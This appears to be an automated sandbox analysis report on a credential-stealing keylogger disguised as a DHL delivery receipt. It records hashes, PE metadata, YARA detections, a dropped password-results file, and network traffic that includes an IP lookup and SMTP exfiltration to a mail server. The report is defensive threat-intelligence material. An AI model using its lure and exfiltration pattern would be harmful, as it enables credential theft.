File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	288
Entropy (8bit):	4.198812223020965
Encrypted:	false
SSDEEP:	6:KkiStv82FZ6vayIuboluzj1hviX/++L8P:KkD82FcvabuMczxV0ZL8P
MD5:	70ADC435E0D206FE7953E8045B4F01B2
SHA1:	836F13823BB9B17CFBBD5D475E45312DBAB0B2F1
SHA-256:	B89EB51318C18F9AC5253D3AEE6DB79F0520F835CAC3F96D8513D6F59D5EDE5C
SHA-512:	5910E939DD0D9F9F301DC352262453AD48120D3EA3AC8F33123542834CA32741FF55B55465282B73C9D7FAE2BD53762CFDCC02ADCF52E89867443AAF4323EFBC
Malicious:	false
Reputation:	low
Preview:	\|------- Results - Passwords -------\|..------- + INFO + -------....IP: 84.17.52.78....Owner Name: 216041..OS Name: Microsoft Windows 10 Pro..OS Version: 6.2.9200.0..OS PlatForm: Win32NT..RAM Size: 8.00 GB..-------------------------............---------------------------------------------

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.498081225430686
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Recibo de entrega de DHL.exe
File size:	375296
MD5:	335a69ee25155d53f6df46c020aa90cd
SHA1:	cbecea1d93ff376b6a7f5ea72c191d4020372344
SHA256:	66dd2c7ac2b0bc7b604efa99f21a828da26c15a366a2e809e23b82dda44b63dd
SHA512:	5169363ca9bbfbec00e718891976b84ff488065dcc59466517b97e241afba882e5ab0afbfa4c20ba6186feafe2f8af6175aa10c194fb5124b59155db11751d3a
SSDEEP:	6144:5lAsmm9PRXvDUtDCpewbzTwrp41W386OvsDfYt7Yt6AECul1CRtA3I/mqV7Uw86w:5l1VvAOYwbY4ksDWY2t2lf3I/mqVc6eF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x45ceb2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xA3A09597 [Thu Dec 28 06:24:23 2056 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5ce60	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5e000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x60000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5ce44	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5aeb8	0x5b000	False	0.784244076236	data	7.51567311339	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x5e000	0x5ac	0x600	False	0.427083333333	data	4.12323823165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x60000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x5e090	0x31c	data
RT_MANIFEST	0x5e3bc	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2020 - 2021
Assembly Version	6.4.0.2
InternalName	c.exe
FileVersion	6.4.0.2
CompanyName
LegalTrademarks
Comments
ProductName	Table Adapter
ProductVersion	6.4.0.2
FileDescription	Table Adapter
OriginalFilename	c.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 11:01:16.038970947 CET	49733	80	192.168.2.4	131.186.113.70
Feb 25, 2021 11:01:16.099210978 CET	80	49733	131.186.113.70	192.168.2.4
Feb 25, 2021 11:01:16.099385023 CET	49733	80	192.168.2.4	131.186.113.70
Feb 25, 2021 11:01:16.100343943 CET	49733	80	192.168.2.4	131.186.113.70
Feb 25, 2021 11:01:16.160640001 CET	80	49733	131.186.113.70	192.168.2.4
Feb 25, 2021 11:01:16.161358118 CET	80	49733	131.186.113.70	192.168.2.4
Feb 25, 2021 11:01:16.161370993 CET	80	49733	131.186.113.70	192.168.2.4
Feb 25, 2021 11:01:16.161622047 CET	49733	80	192.168.2.4	131.186.113.70
Feb 25, 2021 11:01:16.162894011 CET	49733	80	192.168.2.4	131.186.113.70
Feb 25, 2021 11:01:16.223095894 CET	80	49733	131.186.113.70	192.168.2.4
Feb 25, 2021 11:01:27.077466011 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:27.135459900 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:27.135607958 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.086750984 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.087178946 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.145792961 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.146311045 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.209126949 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.255218029 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.266223907 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.339159966 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.339201927 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.339221954 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.339235067 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.339402914 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.343007088 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.395538092 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.453963041 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.505286932 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.692831039 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.750773907 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.774352074 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.832658052 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.833832026 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.912627935 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.913449049 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:28.972265005 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:28.973018885 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.053078890 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.053668022 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.114078999 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.116148949 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.116372108 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.116487026 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.116584063 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.116826057 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.116910934 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.116976976 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.117052078 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:01:29.174374104 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.174437046 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.175268888 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.175314903 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.175347090 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.175359011 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.175373077 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.175384045 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.177833080 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:01:29.224147081 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:03:06.436250925 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:03:06.495474100 CET	587	49738	95.215.225.23	192.168.2.4
Feb 25, 2021 11:03:06.495695114 CET	49738	587	192.168.2.4	95.215.225.23
Feb 25, 2021 11:03:06.610343933 CET	49738	587	192.168.2.4	95.215.225.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 11:00:57.786119938 CET	65248	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:00:57.834882975 CET	53	65248	8.8.8.8	192.168.2.4
Feb 25, 2021 11:00:57.862214088 CET	53723	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:00:57.911875010 CET	53	53723	8.8.8.8	192.168.2.4
Feb 25, 2021 11:00:58.114581108 CET	64646	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:00:58.163386106 CET	53	64646	8.8.8.8	192.168.2.4
Feb 25, 2021 11:00:58.343087912 CET	65298	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:00:58.392647028 CET	53	65298	8.8.8.8	192.168.2.4
Feb 25, 2021 11:00:58.456630945 CET	59123	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:00:58.508207083 CET	53	59123	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:00.365006924 CET	54531	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:00.425132036 CET	53	54531	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:00.852611065 CET	49714	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:00.911444902 CET	53	49714	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:01.691351891 CET	58028	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:01.740298033 CET	53	58028	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:03.453221083 CET	53097	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:03.502044916 CET	53	53097	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:04.835719109 CET	49257	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:04.884881020 CET	53	49257	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:06.250749111 CET	62389	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:06.310662031 CET	53	62389	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:07.639112949 CET	49910	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:07.690696001 CET	53	49910	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:08.828963995 CET	55854	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:08.880951881 CET	53	55854	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:12.284008026 CET	64549	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:12.333422899 CET	53	64549	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:13.464890957 CET	63153	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:13.516590118 CET	53	63153	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:15.877588987 CET	52991	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:15.926315069 CET	53	52991	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:15.945533037 CET	53700	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:16.001646996 CET	53	53700	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:16.659176111 CET	51726	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:16.707952976 CET	53	51726	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:18.119863987 CET	56794	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:18.168627977 CET	53	56794	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:20.756002903 CET	56534	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:20.804708004 CET	53	56534	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:22.978992939 CET	56627	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:23.027931929 CET	53	56627	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:26.425578117 CET	56621	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:26.573837996 CET	53	56621	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:26.868973970 CET	63116	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:27.075436115 CET	53	63116	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:32.071819067 CET	64078	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:32.120655060 CET	53	64078	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:47.278043985 CET	64801	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:47.348462105 CET	53	64801	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:47.897427082 CET	61721	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:47.971132040 CET	53	61721	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:48.510493994 CET	51255	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:48.511616945 CET	61522	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:48.568732977 CET	53	61522	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:48.578937054 CET	53	51255	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:49.014527082 CET	52337	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:49.071497917 CET	53	52337	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:49.603048086 CET	55046	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:49.686888933 CET	53	55046	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:50.278206110 CET	49612	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:50.335593939 CET	53	49612	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:50.919239044 CET	49285	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:50.976711035 CET	53	49285	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:51.756167889 CET	50601	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:51.816200972 CET	53	50601	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:52.792056084 CET	60875	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:52.850532055 CET	53	60875	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:52.907953024 CET	56448	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:52.965240955 CET	53	56448	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:53.143224955 CET	59172	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:53.192209959 CET	53	59172	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:53.437369108 CET	62420	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:53.497195959 CET	53	62420	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:56.012857914 CET	60579	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:56.061723948 CET	53	60579	8.8.8.8	192.168.2.4
Feb 25, 2021 11:01:57.801331043 CET	50183	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:01:57.850121975 CET	53	50183	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:06.442682028 CET	61531	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:06.494203091 CET	53	61531	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:06.902120113 CET	49228	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:06.973751068 CET	53	49228	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:13.079725981 CET	59794	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:13.138896942 CET	53	59794	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:21.658520937 CET	55916	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:21.707285881 CET	53	55916	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:22.440157890 CET	52752	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:22.491825104 CET	53	52752	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:23.797410011 CET	60542	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:23.849209070 CET	53	60542	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:46.085253954 CET	60689	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:46.137064934 CET	53	60689	8.8.8.8	192.168.2.4
Feb 25, 2021 11:02:47.596141100 CET	64206	53	192.168.2.4	8.8.8.8
Feb 25, 2021 11:02:47.667078972 CET	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 25, 2021 11:01:15.877588987 CET	192.168.2.4	8.8.8.8	0xa838	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:15.945533037 CET	192.168.2.4	8.8.8.8	0xa261	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:26.425578117 CET	192.168.2.4	8.8.8.8	0x1f79	Standard query (0)	mail.sapgroup.com.pk	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:26.868973970 CET	192.168.2.4	8.8.8.8	0xdc2f	Standard query (0)	mail.sapgroup.com.pk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 25, 2021 11:01:15.926315069 CET	8.8.8.8	192.168.2.4	0xa838	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 11:01:15.926315069 CET	8.8.8.8	192.168.2.4	0xa838	No error (0)	checkip.dyndns.com		131.186.113.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:15.926315069 CET	8.8.8.8	192.168.2.4	0xa838	No error (0)	checkip.dyndns.com		162.88.193.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:15.926315069 CET	8.8.8.8	192.168.2.4	0xa838	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:15.926315069 CET	8.8.8.8	192.168.2.4	0xa838	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:15.926315069 CET	8.8.8.8	192.168.2.4	0xa838	No error (0)	checkip.dyndns.com		131.186.161.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:16.001646996 CET	8.8.8.8	192.168.2.4	0xa261	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 11:01:16.001646996 CET	8.8.8.8	192.168.2.4	0xa261	No error (0)	checkip.dyndns.com		131.186.113.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:16.001646996 CET	8.8.8.8	192.168.2.4	0xa261	No error (0)	checkip.dyndns.com		216.146.43.71	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:16.001646996 CET	8.8.8.8	192.168.2.4	0xa261	No error (0)	checkip.dyndns.com		216.146.43.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:16.001646996 CET	8.8.8.8	192.168.2.4	0xa261	No error (0)	checkip.dyndns.com		162.88.193.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:16.001646996 CET	8.8.8.8	192.168.2.4	0xa261	No error (0)	checkip.dyndns.com		131.186.161.70	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:26.573837996 CET	8.8.8.8	192.168.2.4	0x1f79	No error (0)	mail.sapgroup.com.pk	sapgroup.com.pk		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 11:01:26.573837996 CET	8.8.8.8	192.168.2.4	0x1f79	No error (0)	sapgroup.com.pk		95.215.225.23	A (IP address)	IN (0x0001)
Feb 25, 2021 11:01:27.075436115 CET	8.8.8.8	192.168.2.4	0xdc2f	No error (0)	mail.sapgroup.com.pk	sapgroup.com.pk		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 11:01:27.075436115 CET	8.8.8.8	192.168.2.4	0xdc2f	No error (0)	sapgroup.com.pk		95.215.225.23	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49733	131.186.113.70	80	C:\Users\user\Desktop\Recibo de entrega de DHL.exe

Timestamp	kBytes transferred	Direction	Data
Feb 25, 2021 11:01:16.100343943 CET	2649	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 25, 2021 11:01:16.161358118 CET	2649	IN	HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.2.0 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 103 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.78</body></html>

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 25, 2021 11:01:28.086750984 CET	587	49738	95.215.225.23	192.168.2.4	220-cp8.ukdns.biz ESMTP Exim 4.93 #2 Thu, 25 Feb 2021 10:01:28 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 25, 2021 11:01:28.087178946 CET	49738	587	192.168.2.4	95.215.225.23	EHLO 216041
Feb 25, 2021 11:01:28.145792961 CET	587	49738	95.215.225.23	192.168.2.4	250-cp8.ukdns.biz Hello 216041 [84.17.52.78] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 25, 2021 11:01:28.146311045 CET	49738	587	192.168.2.4	95.215.225.23	STARTTLS
Feb 25, 2021 11:01:28.209126949 CET	587	49738	95.215.225.23	192.168.2.4	220 TLS go ahead

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Recibo de entrega de DHL.exe PID: 7008 Parent PID: 5924

General

Start time:	11:01:04
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Recibo de entrega de DHL.exe'
Imagebase:	0xa00000
File size:	375296 bytes
MD5 hash:	335A69EE25155D53F6DF46C020AA90CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_404Keylogger, Description: Yara detected 404Keylogger, Source: 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.660324549.0000000003CD1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.660068235.0000000002CD1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: Recibo de entrega de DHL.exe PID: 6416 Parent PID: 7008

General

Start time:	11:01:13
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Imagebase:	0x310000
File size:	375296 bytes
MD5 hash:	335A69EE25155D53F6DF46C020AA90CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: Recibo de entrega de DHL.exe PID: 2912 Parent PID: 7008

General

Start time:	11:01:13
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Recibo de entrega de DHL.exe
Imagebase:	0x9f0000
File size:	375296 bytes
MD5 hash:	335A69EE25155D53F6DF46C020AA90CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
